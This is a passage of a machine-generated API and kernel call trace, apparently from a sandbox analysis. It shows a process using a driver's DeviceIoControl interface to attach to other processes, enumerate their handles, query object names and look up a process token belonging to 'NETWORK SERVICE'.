(in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.940] ObReferenceObjectByHandle (in: Handle=0x280, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800370fa20, HandleInformation=0x0) returned 0x0 [0222.940] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.940] PsReleaseProcessExitSynchronization () returned 0x2 [0222.940] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.940] ObQueryNameString (in: Object=0xfffffa800370fa20, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.941] ObfDereferenceObject (Object=0xfffffa800370fa20) returned 0x1 [0222.941] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.941] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.941] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.941] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0222.941] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.941] PsAcquireProcessExitSynchronization () returned 0x0 [0222.941] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.941] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003710f20, HandleInformation=0x0) returned 0x0 [0222.941] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.941] PsReleaseProcessExitSynchronization () returned 0x2 [0222.941] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.942] ObQueryNameString (in: Object=0xfffffa8003710f20, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.942] ObfDereferenceObject (Object=0xfffffa8003710f20) returned 0x2 [0222.942] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.942] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.942] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.942] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3e, lpOverlapped=0x0) returned 1 [0222.942] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.942] PsAcquireProcessExitSynchronization () returned 0x0 [0222.942] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.942] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003710dd0, HandleInformation=0x0) returned 0x0 [0222.942] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.942] PsReleaseProcessExitSynchronization () returned 0x2 [0222.942] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.942] ObQueryNameString (in: Object=0xfffffa8003710dd0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.943] ObfDereferenceObject (Object=0xfffffa8003710dd0) returned 0x1 [0222.943] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.943] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.943] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.943] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.943] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.943] PsAcquireProcessExitSynchronization () returned 0x0 [0222.943] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.943] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800371cce0, HandleInformation=0x0) returned 0x0 [0222.944] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.944] PsReleaseProcessExitSynchronization () returned 0x2 [0222.944] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.944] ObQueryNameString (in: Object=0xfffffa800371cce0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.944] ObfDereferenceObject (Object=0xfffffa800371cce0) returned 0x1 [0222.944] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.944] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.944] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.944] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0222.944] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.944] PsAcquireProcessExitSynchronization () returned 0x0 [0222.944] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.944] ObReferenceObjectByHandle (in: Handle=0x428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0222.945] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.945] PsReleaseProcessExitSynchronization () returned 0x2 [0222.945] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.945] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.945] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0222.945] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.945] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.945] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.945] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0222.945] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.945] PsAcquireProcessExitSynchronization () returned 0x0 [0222.945] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.946] ObReferenceObjectByHandle (in: Handle=0x460, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c01b00, HandleInformation=0x0) returned 0x0 [0222.946] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.946] PsReleaseProcessExitSynchronization () returned 0x2 [0222.946] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.946] ObQueryNameString (in: Object=0xfffff8a000c01b00, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.946] ObfDereferenceObject (Object=0xfffff8a000c01b00) returned 0x3 [0222.946] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.946] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.946] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.946] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0222.946] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.946] PsAcquireProcessExitSynchronization () returned 0x0 [0222.946] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.946] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c03fc0, HandleInformation=0x0) returned 0x0 [0222.946] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.947] PsReleaseProcessExitSynchronization () returned 0x2 [0222.947] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.947] ObQueryNameString (in: Object=0xfffff8a000c03fc0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.947] ObfDereferenceObject (Object=0xfffff8a000c03fc0) returned 0x2 [0222.947] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.947] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.947] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.947] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0222.947] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.947] PsAcquireProcessExitSynchronization () returned 0x0 [0222.947] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.947] ObReferenceObjectByHandle (in: Handle=0x490, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0222.948] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.948] PsReleaseProcessExitSynchronization () returned 0x2 [0222.948] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.948] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.948] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0222.948] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.948] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.948] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.948] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0222.948] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.948] PsAcquireProcessExitSynchronization () returned 0x0 [0222.948] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.948] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0222.948] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.948] PsReleaseProcessExitSynchronization () returned 0x2 [0222.948] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.949] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.949] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0222.949] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.949] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.949] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.949] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0222.949] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.949] PsAcquireProcessExitSynchronization () returned 0x0 [0222.949] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.949] ObReferenceObjectByHandle (in: Handle=0x508, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0222.949] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.949] PsReleaseProcessExitSynchronization () returned 0x2 [0222.949] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.949] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.950] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0222.950] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.950] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.950] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.950] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0222.950] PsLookupProcessByProcessId (in: ProcessId=0x250, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.950] PsAcquireProcessExitSynchronization () returned 0x0 [0222.950] KeStackAttachProcess (in: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036f9b30, ApcState=0xfffff880052b35d0) [0222.950] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800e2e78e0, HandleInformation=0x0) returned 0x0 [0222.950] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.950] PsReleaseProcessExitSynchronization () returned 0x2 [0222.950] ObfDereferenceObject (Object=0xfffffa80036f9b30) returned 0x7c [0222.951] ObQueryNameString (in: Object=0xfffffa800e2e78e0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.951] ObfDereferenceObject (Object=0xfffffa800e2e78e0) returned 0x11 [0222.951] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.951] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0xc8 [0222.951] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0222.951] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003737b30, HandleInformation=0x0) returned 0x0 [0222.951] ObOpenObjectByPointer (in: Object=0xfffffa8003737b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0222.951] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb4 [0222.951] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa800214e680 | out: TokenHandle=0xfffffa800214e680*=0xc4) returned 0x0 [0222.951] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0222.951] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.951] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0222.952] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0223.451] CloseHandle (hObject=0xc4) returned 1 [0223.451] CloseHandle (hObject=0xc8) returned 1 [0223.452] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.452] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0223.452] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.452] PsAcquireProcessExitSynchronization () returned 0x0 [0223.452] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.452] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800365af20, HandleInformation=0x0) returned 0x0 [0223.452] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.452] PsReleaseProcessExitSynchronization () returned 0x2 [0223.452] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.452] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.452] ObfDereferenceObject (Object=0xfffffa800365af20) returned 0x1 [0223.452] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.453] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.453] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.453] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0223.453] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.453] PsAcquireProcessExitSynchronization () returned 0x0 [0223.453] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.453] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003665760, HandleInformation=0x0) returned 0x0 [0223.453] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.453] PsReleaseProcessExitSynchronization () returned 0x2 [0223.453] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.453] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.453] ObfDereferenceObject (Object=0xfffffa8003665760) returned 0x1 [0223.453] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.453] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.453] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.453] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.453] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.453] PsAcquireProcessExitSynchronization () returned 0x0 [0223.453] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.453] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800374bad0, HandleInformation=0x0) returned 0x0 [0223.453] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.454] PsReleaseProcessExitSynchronization () returned 0x2 [0223.454] ObfDereferenceObject (Object=0xfffffa8003737b30) returned 0xb2 [0223.454] ObQueryNameString (in: Object=0xfffffa800374bad0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.454] ObfDereferenceObject (Object=0xfffffa800374bad0) returned 0x1 [0223.454] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.454] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.454] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.454] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.454] PsLookupProcessByProcessId (in: ProcessId=0x294, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.454] PsAcquireProcessExitSynchronization () returned 0x0 [0223.454] KeStackAttachProcess (in: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003737b30, ApcState=0xfffff880052b35d0) [0223.454] ObReferenceObjectByHandle (in: Handle=0x164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800374cd00, 